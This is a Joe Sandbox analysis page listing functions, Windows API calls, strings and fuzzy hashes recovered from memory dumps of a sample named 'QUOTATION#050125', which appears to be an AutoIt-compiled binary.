Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 45f5b8cc5c8518e8903802e9daec101a72e63e8497943529476336a4aa179d43
Instruction ID: 6de2a0809d14a5816f82ae806b45a690ffc5ae12f1fe9aee065a3b5d3a00444f
Opcode Fuzzy Hash: 45f5b8cc5c8518e8903802e9daec101a72e63e8497943529476336a4aa179d43
Instruction Fuzzy Hash: FD41AD75900209EBDF14AF54DC81AAA7B78FF45304F1480BAED00DA297D734DE58DBA8

Function 005181DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,004DF3AB,00000000,?,?,00000000,?,004D682C,00000004,00000000,00000000), ref: 0051824C
EnableWindow.USER32(00000000,00000000), ref: 00518272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 005182D1
ShowWindow.USER32(00000000,00000004), ref: 005182E5
EnableWindow.USER32(00000000,00000001), ref: 0051830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0051832F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: df71acbdf3727c37efb442ed4a4646727c195360a4c2eb481270c17aad9cec0d
Instruction ID: 36cb5e48567cf6ea75c8d3e567c43e6c7d09316e87d1e5eacc11ea9295e2c4c5
Opcode Fuzzy Hash: df71acbdf3727c37efb442ed4a4646727c195360a4c2eb481270c17aad9cec0d
Instruction Fuzzy Hash: 2E419234601A44AFEB22CF14CC99BF47FF0BB56715F184169E5284F2A2CB71A885DB50

Function 004E175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004E0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004E0FCA
Part of subcall function 004E0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004E0FD6
Part of subcall function 004E0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004E0FE5
Part of subcall function 004E0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004E0FEC
Part of subcall function 004E0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004E1002

GetLengthSid.ADVAPI32(?,00000000,004E1335), ref: 004E17AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004E17BA
HeapAlloc.KERNEL32(00000000), ref: 004E17C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 004E17DA
GetProcessHeap.KERNEL32(00000000,00000000,004E1335), ref: 004E17EE
HeapFree.KERNEL32(00000000), ref: 004E17F5

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: fc2de6b8520d50e5025151752f4be55ba2dfd7fb6c6b7cc2e81d1b60ba42d730
Instruction ID: f8fe58a854b7bb1f7d28b91724f77a4fa425b5db0ecbf5f5c903939b3b24720d
Opcode Fuzzy Hash: fc2de6b8520d50e5025151752f4be55ba2dfd7fb6c6b7cc2e81d1b60ba42d730
Instruction Fuzzy Hash: D5118E315C4205FFDB109FA5CC89BEFBBB9EB45756F10801AF48197220D73AA944DB64

Function 004E14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004E14FF
OpenProcessToken.ADVAPI32(00000000), ref: 004E1506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004E1515
CloseHandle.KERNEL32(00000004), ref: 004E1520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004E154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 004E1563

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 7a2b8f8994a9e6658884ee264b5f5a8d53145263e717626d9b9030d277542417
Instruction ID: bf256dee4a3b94eb2f1a7438e49ff67394f7ebeaddff2a44f29bb6cd3bddd507
Opcode Fuzzy Hash: 7a2b8f8994a9e6658884ee264b5f5a8d53145263e717626d9b9030d277542417
Instruction Fuzzy Hash: 86115972540249ABDF118F98DE49FDE7BA9EF48745F048019FA05A21A0C3768E64EB60

Function 00518A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00499639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00499693
Part of subcall function 00499639: SelectObject.GDI32(?,00000000), ref: 004996A2
Part of subcall function 00499639: BeginPath.GDI32(?), ref: 004996B9
Part of subcall function 00499639: SelectObject.GDI32(?,00000000), ref: 004996E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00518A4E
LineTo.GDI32(?,00000003,00000000), ref: 00518A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00518A70
LineTo.GDI32(?,00000000,00000003), ref: 00518A80
EndPath.GDI32(?), ref: 00518A90
StrokePath.GDI32(?), ref: 00518AA0

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: adff1323794a5541a9145ff759552ac1cd6cf2a50764907aed492976e235b670
Instruction ID: d78fc6b6540018bf9dd097a9886833735beff50be2ea59d8873f9f3588298501
Opcode Fuzzy Hash: adff1323794a5541a9145ff759552ac1cd6cf2a50764907aed492976e235b670
Instruction Fuzzy Hash: 15110C76040108FFEF119F94DC48EEA7F6CEF19354F00C052BA1595161C7729D99EBA0

Function 004E51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004E5218
GetDeviceCaps.GDI32(00000000,00000058), ref: 004E5229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004E5230
ReleaseDC.USER32(00000000,00000000), ref: 004E5238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 004E524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 004E5261

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: b14a8e1280f492dcc25616d59dadac27cb65c9bde427948e2a85684042e5e17e
Instruction ID: 46b3f9a29496d3e34b65ba0931f231666153d47948ecd4d19176d2c113db6281
Opcode Fuzzy Hash: b14a8e1280f492dcc25616d59dadac27cb65c9bde427948e2a85684042e5e17e
Instruction Fuzzy Hash: 3001A775E40704BBEB109BA69C49E9EBF78EF58351F048066FA04A7380D671DC04DF60

Function 00481BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00481BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00481BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00481C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00481C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00481C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00481C22

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 4ea0079dcb481ef740142b7687334ff83c6a06b2f098444ceb099917f582e08c
Instruction ID: 8876c848372a3546028d6779b82595adb22b7bea29cfc4ca0a718a9f1f21d45d
Opcode Fuzzy Hash: 4ea0079dcb481ef740142b7687334ff83c6a06b2f098444ceb099917f582e08c
Instruction Fuzzy Hash: 52016CB0942759BDE3008F5A8C85B52FFA8FF19354F00411B915C4B941C7F5A864CBE5

Function 004EEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004EEB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004EEB46
GetWindowThreadProcessId.USER32(?,?), ref: 004EEB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004EEB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004EEB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004EEB75

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 060caa330652b0d87aa9132c3419cf75519e8c1fe3429719c640a326e48d76c0
Instruction ID: 6b7d2d055ee77e7ec976c6bb19fb6e628287e24ff1a44564293f7edbe7662238
Opcode Fuzzy Hash: 060caa330652b0d87aa9132c3419cf75519e8c1fe3429719c640a326e48d76c0
Instruction Fuzzy Hash: 7EF09A722C0168BFE7215B629C0EEEF3E7CEFDAB11F008158F601D1090E7A21A05E6B4

Function 004D7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 004D7452
SendMessageW.USER32(?,00001328,00000000,?), ref: 004D7469
GetWindowDC.USER32(?), ref: 004D7475
GetPixel.GDI32(00000000,?,?), ref: 004D7484
ReleaseDC.USER32(?,00000000), ref: 004D7496
GetSysColor.USER32(00000005), ref: 004D74B0

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 22c198427c73096e7f7a4bb785958dda03d4ab078516f4393e9c4d7ba5439f7f
Instruction ID: 0bae99d6e33c27d974209ff2f741941adb07bcf563898846e53ea01373780744
Opcode Fuzzy Hash: 22c198427c73096e7f7a4bb785958dda03d4ab078516f4393e9c4d7ba5439f7f
Instruction Fuzzy Hash: AE018B31440215EFDB515F68DC08BEA7FB6FB14311F5180A5F916A22A0DB321E45EB11

Function 004E1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 004E187F
UnloadUserProfile.USERENV(?,?), ref: 004E188B
CloseHandle.KERNEL32(?), ref: 004E1894
CloseHandle.KERNEL32(?), ref: 004E189C
GetProcessHeap.KERNEL32(00000000,?), ref: 004E18A5
HeapFree.KERNEL32(00000000), ref: 004E18AC

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: b0c20fe2a73fa3b9e144f70b948696dc141d6a5bd756c9fb48aa709babb9acdc
Instruction ID: aecf72ead2087da7766dd5e4bf6c3c4c448ad77f44832d1f9d3f522c4639f18b
Opcode Fuzzy Hash: b0c20fe2a73fa3b9e144f70b948696dc141d6a5bd756c9fb48aa709babb9acdc
Instruction Fuzzy Hash: E5E0E5364C4211BBDB016FA1ED0C98ABF3AFF69B22B10C624F225810B0CB739424EF50

Function 00503947 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0050396B
CharUpperBuffW.USER32(?,?), ref: 00503A7A
VariantClear.OLEAUT32(?), ref: 00503C1F

Part of subcall function 004F0CDF: VariantInit.OLEAUT32(00000000), ref: 004F0D1F
Part of subcall function 004F0CDF: VariantCopy.OLEAUT32(?,?), ref: 004F0D28
Part of subcall function 004F0CDF: VariantClear.OLEAUT32(?), ref: 004F0D34

Strings

AUTOIT.ERROR, xrefs: 00503A80, 00503A85
Incorrect Parameter format, xrefs: 005039A6, 00503BA1

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: e20b1440de5fb9cbe8ba4cb26bf483796dc624b4aabe559e0380e31dc2456412
Instruction ID: 7d2068df88a5f94907e3a65cd76d49b9b20d4be8221cf5554ce89c0281aedcfb
Opcode Fuzzy Hash: e20b1440de5fb9cbe8ba4cb26bf483796dc624b4aabe559e0380e31dc2456412
Instruction Fuzzy Hash: C69148746083059FC704EF25C48496EBBE8BF89318F14882EF88997391DB35EE05CB92

Function 00504BAD Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 004E000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004DFF41,80070057,?,?,?,004E035E), ref: 004E002B
Part of subcall function 004E000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004DFF41,80070057,?,?), ref: 004E0046
Part of subcall function 004E000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004DFF41,80070057,?,?), ref: 004E0054
Part of subcall function 004E000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004DFF41,80070057,?), ref: 004E0064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00504C51
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00504DCF
CoTaskMemFree.OLE32(?), ref: 00504DDA

Strings

NULL Pointer assignment, xrefs: 00504E23, 00504E52

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 4175897753-2785691316
Opcode ID: 9a133d87ed5c940c235f4b83c48ce3b958ad502e1bae636a36e5bcaf99cd0868
Instruction ID: cc31616da15cb61ad813fcab11cc4001e2c227f763812a6314e7a3c5d15ac241
Opcode Fuzzy Hash: 9a133d87ed5c940c235f4b83c48ce3b958ad502e1bae636a36e5bcaf99cd0868
Instruction Fuzzy Hash: DD9129B1D0021DAFDF14EFA5C891AEDBBB8BF48304F10456AE915A7291DB745E44CF60

Function 00508CD3 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00508CF3

Strings

winapi, xrefs: 00508D96, 00508D9B
cdecl, xrefs: 00508D48, 00508D4D
stdcall, xrefs: 00508DD6, 00508DDB
none, xrefs: 00508E65, 00508E6A

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: cb279e6163c0518e09ebb010c2ec1bb459a078a6401a1008c74d1121ae5af7fe
Instruction ID: c3cf16335ae99a053ec57e71e4e156475d384fc7162bef770a6f00c0cad94f6e
Opcode Fuzzy Hash: cb279e6163c0518e09ebb010c2ec1bb459a078a6401a1008c74d1121ae5af7fe
Instruction Fuzzy Hash: 1251C372A005169BCF14DF6CC940DBEBBA9BF65324B25462AE4A6E73C4DB34ED40C790

Function 0050AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0050AEA3
GetProcessId.KERNEL32(00000000), ref: 0050AF38
CloseHandle.KERNEL32(00000000), ref: 0050AF67

Strings

@, xrefs: 0050AE72
<, xrefs: 0050AE6B

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell
String ID: <$@
API String ID: 1279613386-1426351568
Opcode ID: 189f5ccfe5c54cae587cedd7a59dd33895ccb36b21122210c5540ca634b7d736
Instruction ID: 0a5731a6c123959700b33061d4a3775046b1b35ff005feebf4088f15308812f4
Opcode Fuzzy Hash: 189f5ccfe5c54cae587cedd7a59dd33895ccb36b21122210c5540ca634b7d736
Instruction Fuzzy Hash: E6718975A00615DFCB10EF65C484A9EBBF0BF08308F14889EE816AB792C774ED45CB95

Function 004EB5C8 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004EB5FC

Strings

KEYS, xrefs: 004EB647, 004EB64C
REMOVE, xrefs: 004EB602, 004EB607
EXISTS, xrefs: 004EB686, 004EB68B
APPEND, xrefs: 004EB6C1, 004EB6C6

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: d1337c570f02f0565a465073f85050f76b19f9f4c576b79416aebb70982ab003
Instruction ID: 75374ed1a3ef91989ef2e860903876f30c687800fde408faa7aad65688bdf91e
Opcode Fuzzy Hash: d1337c570f02f0565a465073f85050f76b19f9f4c576b79416aebb70982ab003
Instruction Fuzzy Hash: 18411732A001678ACB206F7E88905BFBBA5FBA1759B24412BE461D7380E739CD81C7D5

Function 004E719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004E7206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004E723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004E724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004E72CF

Strings

DllGetClassObject, xrefs: 004E7242

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: b562872ae1b48322bc8991e2613407644da6c042b77754f02d660745fdd350cb
Instruction ID: b41b26d7cc4e12262011c2c263169dfa67316bbaff85be1d0c331b939d82ca10
Opcode Fuzzy Hash: b562872ae1b48322bc8991e2613407644da6c042b77754f02d660745fdd350cb
Instruction Fuzzy Hash: C141CF71604204EFDB15CF55C884A9A7FA9EF44321F1080EEFE099F24AD7B5D944CBA4

Function 00513D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00513E35
IsMenu.USER32(?), ref: 00513E4A
